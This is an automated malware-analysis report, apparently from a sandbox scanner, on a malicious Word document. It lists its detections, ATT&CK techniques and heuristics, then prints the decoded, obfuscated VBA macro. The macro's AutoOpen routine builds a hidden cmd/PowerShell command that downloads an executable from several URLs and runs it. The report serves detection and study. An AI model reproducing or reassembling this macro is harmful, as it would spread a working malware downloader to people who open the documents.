Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is designed to execute a shell command, likely to download and run a second-stage payload. The macro code is heavily obfuscated, but the presence of the AutoOpen function and the ClamAV detection strongly indicate malicious intent.
Heuristics (5)

- ClamAV: Doc.Downloader.00536d-6690604-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.00536d-6690604-0
- VBA macros detected [medium, OLE_VBA_MACROS, 1 related finding]: Document contains VBA macro code
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5865 bytes |

SHA-256: cd9483d9a3f4de5a743aae9b4b36da3f47429d80c78a79f10903c4ca3f96d977
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "LhPBpKcukiC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const XzBjvOXRG = 0
Dim fWVLTj(2)
fWVLTj(0) = MidB(hONKDdVO, 885, 566)
fWVLTj(1) = MidB(hONKDdVO, 885, 566)
Dim ZlpqI(5)
ZlpqI(0) = MidB(hONKDdVO, 885, 566)
ZlpqI(1) = MidB(hONKDdVO, 885, 566)
ZlpqI(2) = Right(zrLHbwkS, 815)
ZlpqI(3) = Left(JdjfWw, 643)
ZlpqI(4) = Left(JdjfWw, 643)
Dim iGsofz(2)
iGsofz(0) = Left(JdjfWw, 643)
iGsofz(1) = Mid(hzsSsS, 169, 865)
Dim nwUYP(3)
nwUYP(0) = MidB(hONKDdVO, 885, 566)
nwUYP(1) = MidB(hONKDdVO, 885, 566)
nwUYP(2) = Mid(hzsSsS, 169, 865)
Dim thwPQl(5)
thwPQl(0) = Left(JdjfWw, 643)
thwPQl(1) = Left(JdjfWw, 643)
thwPQl(2) = Mid(hzsSsS, 169, 865)
thwPQl(3) = Left(JdjfWw, 643)
thwPQl(4) = Right(zrLHbwkS, 815)
Dim JbYqQ(3)
JbYqQ(0) = Mid(hzsSsS, 169, 865)
JbYqQ(1) = Left(JdjfWw, 643)
JbYqQ(2) = Left(JdjfWw, 643)
Dim pKhiR(3)
pKhiR(0) = Mid(hzsSsS, 169, 865)
pKhiR(1) = Right(zrLHbwkS, 815)
pKhiR(2) = Mid(hzsSsS, 169, 865)
Shell@ zFcKWSPrk + mnMwadtkTcMar + XzorwUROs, XzBjvOXRG
Dim jOkqt(2)
jOkqt(0) = Left(JdjfWw, 643)
jOkqt(1) = MidB(hONKDdVO, 885, 566)
Dim AtcXP(2)
AtcXP(0) = Mid(hzsSsS, 169, 865)
AtcXP(1) = Right(zrLHbwkS, 815)
Dim aOBFwj(3)
aOBFwj(0) = Left(JdjfWw, 643)
aOBFwj(1) = MidB(hONKDdVO, 885, 566)
aOBFwj(2) = Right(zrLHbwkS, 815)
Dim pJcDor(3)
pJcDor(0) = Left(JdjfWw, 643)
pJcDor(1) = Right(zrLHbwkS, 815)
pJcDor(2) = Right(zrLHbwkS, 815)
End Sub
Attribute VB_Name = "ZUwMziAcjq"
Function zFcKWSPrk()
Dim vXlRq(5)
vXlRq(0) = Left(JdjfWw, 643)
vXlRq(1) = Left(JdjfWw, 643)
vXlRq(2) = MidB(hONKDdVO, 885, 566)
vXlRq(3) = Right(zrLHbwkS, 815)
vXlRq(4) = Left(JdjfWw, 643)
Dim hIKUK(2)
hIKUK(0) = Right(zrLHbwkS, 815)
hIKUK(1) = Left(JdjfWw, 643)
ituVWb = Chr(Format(9 + 3 + 16 + 8 + 63)) + "md /V/" + Chr(Format(6 + 2 + 11 + 5 + 43)) + Chr(Format(3 + 1 + 5 + 2 + 23)) + "s^e^t" + " ^O" + Chr(Format(9 + 3 + 16 + 8 + 63)) + "E^j= ^ ^ ^ ^ ^ ^ ^" + " ^ ^ ^ ^}^}{^h" + Chr(Format(9 + 3 + 16 + 8 + 63)) + "t^a" + Chr(Format(9 + 3 + 16 + 8 + 63)) + "};^k^a^erb^;" + "Tv^L$ ^m^et^I^-" + "ek^ovn^I;)^Tv"
Dim ijnnhl(2)
ijnnhl(0) = Mid(hzsSsS, 169, 865)
ijnnhl(1) = Left(JdjfWw, 643)
Dim iJLFu(4)
iJLFu(0) = Mid(hzsSsS, 169, 865)
iJLFu(1) = MidB(hONKDdVO, 885, 566)
iJLFu(2) = Right(zrLHbwkS, 815)
iJLFu(3) = Right(zrLHbwkS, 815)
Dim oBUWUK(4)
oBUWUK(0) = MidB(hONKDdVO, 885, 566)
oBUWUK(1) = Right(zrLHbwkS, 815)
oBUWUK(2) = Mid(hzsSsS, 169, 865)
oBUWUK(3) = Left(JdjfWw, 643)
cmDhH = "L$ ,^s^" + "Tp^$(e^li^" + "Fdaolnw^o^D^.B^k^k$^{^yr^t" + "{)wZZ$ ni^ ^s^Tp^$(h" + Chr(Format(9 + 3 + 16 + 8 + 63)) + "a^er" + "^o^f;'ex^e^.'^+^SV^j$+'" + "\'+" + Chr(Format(9 + 3 + 16 + 8 + 63)) + "^i" + "lb^u^p:vn^e^$^=TvL^$^;'5^1^1'"
Dim UTpBT(2)
UTpBT(0) = Right(zrLHbwkS, 815)
UTpBT(1) = Mid(hzsSsS, 169, 865)
Dim FrbUX(5)
FrbUX(0) = Mid(hzsSsS, 169, 865)
FrbUX(1) = Mid(hzsSsS, 169, 865)
FrbUX(2) = MidB(hONKDdVO, 885, 566)
FrbUX(3) = Left(JdjfWw, 643)
FrbUX(4) = MidB(hONKDdVO, 885, 566)
nAHbw = " =^ ^SV^j$^;)'@'(^t^il^p" + "S.^'i^H^x" + Chr(Format(9 + 3 + 16 + 8 + 63)) + "wSG/ur^" + ".tkelpmok-^mes//^:p^t" + "t^h@LJgv^o" + "^w^8^04/^ln.b^bo^ot^s//:p^t^"
Dim JwjNZ(4)
JwjNZ(0) = Right(zrLHbwkS, 815)
JwjNZ(1) = Mid(hzsSsS, 169, 865)
JwjNZ(2) = Left(JdjfWw, 643)
JwjNZ(3) = Mid(hzsSsS, 169, 865)
JzuKhAzw = "t^h^@^d^m^8r^Q^K^tx" + "m/m^o" + Chr(Format(9 + 3 + 16 + 8 + 63)) + ".o^es^alov^e" + Chr(Format(9 + 3 + 16 + 8 + 63)) + "snho^j//:^pt^t^h@^1^f^" + "e" + Chr(Format(6 + 2 + 11 + 5 + 43)) + "^x^J^L^t/m^o" + Chr(Format(9 + 3 + 16 + 8 + 63)) + "^.20^b" + "ef20//^:pt^t^" + "h@" + Chr(Format(9 + 3 + 16 + 8 + 63)) + "^4M^5^F" + "rd/^m^o" + Chr(Format(9 + 3 + 16 + 8 + 63)) + "^.av^i^t^a^er"
Dim jVqzR(5)
jVqzR(0) = Mid(hzsSsS, 169, 865)
jVqzR(1) = Right(zrLHbwkS, 815)
jVqzR(2) = Mid(hzsSsS, 169, 865)
... (truncated)